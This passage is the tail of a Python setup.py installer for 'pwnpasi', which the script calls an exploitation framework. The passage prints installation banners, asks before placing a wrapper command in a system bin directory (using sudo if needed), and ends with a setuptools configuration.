dependencies\r\n print(f\"\\n{Colors.BOLD}{Colors.BLUE}ā•”ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•—{Colors.END}\")\r\n print(f\"{Colors.BOLD}{Colors.BLUE}ā•‘{Colors.END} {Colors.CYAN}SYSTEM DEPENDENCIES PHASE{Colors.END} {Colors.BOLD}{Colors.BLUE}ā•‘{Colors.END}\")\r\n print(f\"{Colors.BOLD}{Colors.BLUE}ā•šā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•{Colors.END}\")\r\n install_system_dependencies()\r\n \r\n # Python dependencies\r\n print(f\"\\n{Colors.BOLD}{Colors.BLUE}ā•”ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•—{Colors.END}\")\r\n print(f\"{Colors.BOLD}{Colors.BLUE}ā•‘{Colors.END} {Colors.CYAN}PYTHON DEPENDENCIES PHASE{Colors.END} {Colors.BOLD}{Colors.BLUE}ā•‘{Colors.END}\")\r\n print(f\"{Colors.BOLD}{Colors.BLUE}ā•šā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•{Colors.END}\")\r\n install_python_dependencies()\r\n \r\n # Completion\r\n print(f\"\\n{Colors.BOLD}{Colors.GREEN}ā•”ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•—{Colors.END}\")\r\n print(f\"{Colors.BOLD}{Colors.GREEN}ā•‘{Colors.END} {Colors.WHITE}INSTALLATION COMPLETE{Colors.END} {Colors.BOLD}{Colors.GREEN}ā•‘{Colors.END}\")\r\n print(f\"{Colors.BOLD}{Colors.GREEN}ā•šā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•{Colors.END}\")\r\n \r\n print_status('success', f\"PWNPASI framework successfully installed!\")\r\n print_status('info', f\"Ready for advanced PWN exploitation\")\r\n print(f\"\\n{Colors.CYAN} Usage: {Colors.WHITE}python pwnpasi.py -l {Colors.END}\")\r\n print(f\"{Colors.CYAN} Help: {Colors.WHITE}python pwnpasi.py --help{Colors.END}\\n\")\r\n\r\ndef setup_system_command():\r\n \"\"\"Setup pwnpasi as a system command\"\"\"\r\n import shutil\r\n import stat\r\n \r\n # Get current script path\r\n current_dir = os.path.dirname(os.path.abspath(__file__))\r\n pwnpasi_script = os.path.join(current_dir, 'pwnpasi.py')\r\n \r\n # Determine system bin directory\r\n if os.name == 'posix': # Linux/macOS\r\n bin_dirs = ['/usr/local/bin', '/usr/bin']\r\n target_name = 'pwnpasi'\r\n else: # Windows\r\n # For Windows, we'll add to Python Scripts directory\r\n import sys\r\n scripts_dir = os.path.join(os.path.dirname(sys.executable), 'Scripts')\r\n bin_dirs = [scripts_dir] if os.path.exists(scripts_dir) else []\r\n target_name = 'pwnpasi.py'\r\n \r\n # Find writable bin directory\r\n target_dir = None\r\n for bin_dir in bin_dirs:\r\n if os.path.exists(bin_dir) and os.access(bin_dir, os.W_OK):\r\n target_dir = bin_dir\r\n break\r\n \r\n if not target_dir:\r\n print_status('warning', \"No writable system directory found, trying with sudo...\")\r\n target_dir = bin_dirs[0] if bin_dirs else '/usr/local/bin'\r\n \r\n target_path = os.path.join(target_dir, target_name)\r\n \r\n try:\r\n # Copy script to system directory\r\n print_status('process', f\"Installing pwnpasi to {target_path}...\")\r\n \r\n if os.name == 'posix':\r\n # For Linux/macOS, create a wrapper script\r\n wrapper_content = f\"#!/usr/bin/env python3\\n# PWNPASI System Command Wrapper\\nimport sys\\nimport os\\nsys.path.insert(0, '{current_dir}')\\nfrom pwnpasi import main\\nif __name__ == '__main__':\\n main()\\n\"\r\n \r\n # Try to write directly first\r\n try:\r\n with open(target_path, 'w') as f:\r\n f.write(wrapper_content)\r\n os.chmod(target_path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)\r\n except PermissionError:\r\n # Use sudo if needed\r\n import tempfile\r\n with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.py') as tmp:\r\n tmp.write(wrapper_content)\r\n tmp_path = tmp.name\r\n \r\n run_command(['sudo', 'cp', tmp_path, target_path], f\"Failed to install to {target_path}\")\r\n run_command(['sudo', 'chmod', '+x', target_path], f\"Failed to set permissions for {target_path}\")\r\n os.unlink(tmp_path)\r\n else:\r\n # For Windows, copy the script directly\r\n shutil.copy2(pwnpasi_script, target_path)\r\n \r\n print_status('success', f\"PWNPASI installed as system command: {target_name}\")\r\n print_status('info', f\"You can now run 'pwnpasi' from anywhere in the terminal\")\r\n \r\n # Add to PATH if needed (Windows)\r\n if os.name == 'nt' and target_dir not in os.environ.get('PATH', '').split(os.pathsep):\r\n print_status('info', f\"Add {target_dir} to your PATH environment variable for global access\")\r\n \r\n except Exception as e:\r\n print_status('error', f\"Failed to install system command: {str(e)}\")\r\n print_status('info', \"You can still run pwnpasi using: python pwnpasi.py\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n \r\n # Ask user if they want to install as system command\r\n print(f\"\\n{Colors.CYAN}ā•”ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•—{Colors.END}\")\r\n print(f\"{Colors.CYAN}ā•‘{Colors.END} {Colors.YELLOW}SYSTEM COMMAND SETUP{Colors.END} {Colors.CYAN}ā•‘{Colors.END}\")\r\n print(f\"{Colors.CYAN}ā•šā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•ā•{Colors.END}\")\r\n \r\n response = input(f\"{Colors.CYAN}[ā—‰]{Colors.END} Install pwnpasi as system command? (y/N): \").strip().lower()\r\n if response in ['y', 'yes']:\r\n setup_system_command()\r\n else:\r\n print_status('info', \"Skipped system command installation\")\r\n print_status('info', \"Run 'python setup.py' again and choose 'y' to install later\")\r\nelse:\r\n setup(\r\n name=\"pwnpasi\",\r\n version=\"3.0.0\",\r\n description=\"Advanced PWN Exploitation Framework\",\r\n author=\"Ba1_Ma0\",\r\n packages=find_packages(),\r\n install_requires=[\r\n 'pwntools>=4.9.0',\r\n 'LibcSearcher>=1.1.5',\r\n 'ropper>=1.13.5'\r\n ],\r\n python_requires='>=3.8',\r\n entry_points={\r\n 'console_scripts': [\r\n 'pwnpasi=pwnpasi:main',\r\n ],\r\n },\r\n scripts=['pwnpasi.py'],\r\n )" } ]